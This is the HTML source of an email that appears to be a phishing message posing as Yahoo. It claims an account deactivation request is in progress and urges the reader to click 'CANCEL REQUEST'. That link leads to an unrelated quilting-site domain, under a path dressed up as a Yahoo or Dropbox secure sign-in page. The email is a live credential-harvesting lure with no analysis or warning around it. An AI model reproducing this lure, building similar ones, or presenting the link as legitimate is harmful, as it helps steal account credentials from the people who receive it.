<div data-test-id="message-body-container"><div data-test-id="message-view-body"><div class="msg-body P_wpofO iy_A" data-test-id="message-view-body-content"><div class="jb_0 X_6MGW N_6Fd5"><div><div id="yiv9041426010"><div><div style="color:#000;background-color:#fff;font-family:Helvetica Neue, Helvetica, Arial, Lucida Grande, sans-serif;font-size:13px;"><div style="" id="yiv9041426010yui_3_16_0_ym19_1_1526686544518_24972">
	<div id="yiv9041426010yui_3_16_0_ym19_1_1526686544518_24973">
		<div id="yiv9041426010yui_3_16_0_ym19_1_1526686544518_24974">
			<div id="yiv9041426010yui_3_16_0_ym19_1_1526686544518_24975">
				<div style="color:#000;background-color:#fff;font-family:Helvetica Neue, Helvetica, Arial, Lucida Grande, sans-serif;font-size:13px;" id="yiv9041426010yui_3_16_0_ym19_1_1526686544518_24976">
					<div style="" id="yiv9041426010yui_3_16_0_ym19_1_1526686544518_24977">
						<div id="yiv9041426010yui_3_16_0_ym19_1_1526686544518_24978">
							<div id="yiv9041426010yui_3_16_0_ym19_1_1526686544518_24979">
								<div id="yiv9041426010yui_3_16_0_ym19_1_1526686544518_24980">
									<div style="color:#000;background-color:#fff;font-family:Helvetica Neue, Helvetica, Arial, Lucida Grande, sans-serif;font-size:13px;" id="yiv9041426010yui_3_16_0_ym19_1_1526686544518_24981">
										<div style="" id="yiv9041426010yui_3_16_0_ym19_1_1526686544518_24982">
											<div id="yiv9041426010yui_3_16_0_ym19_1_1526686544518_24983">
												<div id="yiv9041426010yui_3_16_0_ym19_1_1526686544518_24984">
													<div id="yiv9041426010yui_3_16_0_ym19_1_1526686544518_24985">
														<div style="color:#000;background-color:#fff;font-family:Helvetica Neue, Helvetica, Arial, Lucida Grande, sans-serif;font-size:13px;" id="yiv9041426010yui_3_16_0_ym19_1_1526686544518_24986">
															<div id="yiv9041426010yui_3_16_0_ym19_1_1526686544518_24987">
																<div id="yiv9041426010yui_3_16_0_ym19_1_1526686544518_24988">
																	<div id="yiv9041426010yui_3_16_0_ym19_1_1526686544518_24989">
																		<div id="yiv9041426010yui_3_16_0_ym19_1_1526686544518_24990">
																			<div id="yiv9041426010yui_3_16_0_ym19_1_1526686544518_24991">
																				<div style="color:#000;background-color:#fff;font-family:Helvetica Neue, Helvetica, Arial, Lucida Grande, sans-serif;font-size:13px;" id="yiv9041426010yui_3_16_0_ym19_1_1526686544518_24992">
																					<div style="color:rgb(0, 0, 0);font-style:normal;font-weight:normal;letter-spacing:normal;orphans:2;text-indent:0px;text-transform:none;white-space:normal;widows:2;word-spacing:0px;text-decoration-color:initial;font-size:13px;font-family:calibri, arial, helvetica, sans-serif;padding:0px;margin-left:0px;background-color:rgb(255, 255, 255);margin-right:0px;" id="yiv9041426010yui_3_16_0_ym19_1_1526686544518_24993">
																						<span style="font-size:25pt;color:white;background:purple 0% 50%;" id="yiv9041426010yui_3_16_0_ym19_1_1526686544518_24994"><span id="yiv9041426010yui_3_16_0_ym19_1_1526686544518_24995">&nbsp;</span>&nbsp; &nbsp; &nbsp; YAHOO!&nbsp;&nbsp; &nbsp;&nbsp; &nbsp; &nbsp;&nbsp;</span></div>
																					<div style="margin:0px;padding:0px;display:block;color:rgb(0, 0, 0);font-style:normal;font-weight:350;letter-spacing:normal;orphans:2;text-indent:0px;text-transform:none;white-space:normal;widows:2;word-spacing:0px;text-decoration-color:initial;font-size:13px;font-family:Helvetica, Arial, sans-serif;background-color:rgb(255, 255, 255);" id="yiv9041426010yui_3_16_0_ym19_1_1526686544518_24996">
																						<br id="yiv9041426010yui_3_16_0_ym19_1_1526686544518_24997">
																						Hi,<span id="yiv9041426010yui_3_16_0_ym19_1_1526686544518_24998">
																						<br id="yiv9041426010yui_3_16_0_ym19_1_1526686544518_25002">
																						Your request to deactivate your Yahoo account was received by our team, We are currently working on this request. <br id="yiv9041426010yui_3_16_0_ym19_1_1526686544518_25003">
																						If it wasn't you, kindly click on the link below to cancel request .<br id="yiv9041426010yui_3_16_0_ym19_1_1526686544518_25004">
																						<br id="yiv9041426010yui_3_16_0_ym19_1_1526686544518_25005">
																						<span style="font-size:9pt;color:rgb(69, 69, 69);" id="yiv9041426010yui_3_16_0_ym19_1_1526686544518_25006"><a rel="nofollow" style="text-decoration:underline;color:rgb(25, 106, 212);outline:none medium;margin:0px;padding:0px;" target="_blank" href="https://heartstringquilters.com/yahoo/dropbox/ZOHODROP/dropboxsharepoint/securedfile/yahoosecuredsignin/login.html?accessToFile=granted&fileAccess=7513&encryptedCookie=bb2975df18968c9934eae974ac447f05&u=c7ea56c6fa527927dc8d440ca28fb05d&connecting=96dcdd8f3925c6fc80fcc123a1f0f1e7&phaseAccess=b9d6ebda56e8d319b337bad2ba899d09&p=3a80105f37b3b18dd0036bb96f1a3410" id="yiv9041426010yui_3_16_0_ym19_1_1526686544518_25007">CANCEL REQUEST</a></span><br id="yiv9041426010yui_3_16_0_ym19_1_1526686544518_25008">
																						<br id="yiv9041426010yui_3_16_0_ym19_1_1526686544518_25009">
																						Thank You.<br id="yiv9041426010yui_3_16_0_ym19_1_1526686544518_25010">
																						Mail support-<br id="yiv9041426010yui_3_16_0_ym19_1_1526686544518_25011">
																						Replies sent to this mail cannot be answered.<br id="yiv9041426010yui_3_16_0_ym19_1_1526686544518_25012">
																						<br id="yiv9041426010yui_3_16_0_ym19_1_1526686544518_25013">
																						</div>
																					<div style="margin:0px;padding:0px;display:block;color:rgb(0, 0, 0);font-style:normal;font-weight:400;letter-spacing:normal;orphans:2;text-indent:0px;text-transform:none;white-space:normal;widows:2;word-spacing:0px;text-decoration-color:initial;font-size:13px;font-family:Helvetica, Arial, sans-serif;background-color:rgb(255, 255, 255);" id="yiv9041426010yui_3_16_0_ym19_1_1526686544518_25014">
																						&nbsp;</div>
																					<div style="margin:0px;padding:0px;display:block;color:rgb(0, 0, 0);font-style:normal;font-weight:400;letter-spacing:normal;orphans:2;text-indent:0px;text-transform:none;white-space:normal;widows:2;word-spacing:0px;text-decoration-color:initial;font-size:13px;font-family:Helvetica, Arial, sans-serif;background-color:rgb(255, 255, 255);" id="yiv9041426010yui_3_16_0_ym19_1_1526686544518_25015">
																						Mail Team.</div>
																				</div>
																			</div>
																		</div>
																	</div>
																</div>
															</div>
														</div>
													</div>
												</div>
											</div>
										</div>
									</div>
								</div>
							</div>
						</div>
					</div>
				</div>
			</div>
		</div>
	</div>
</div>
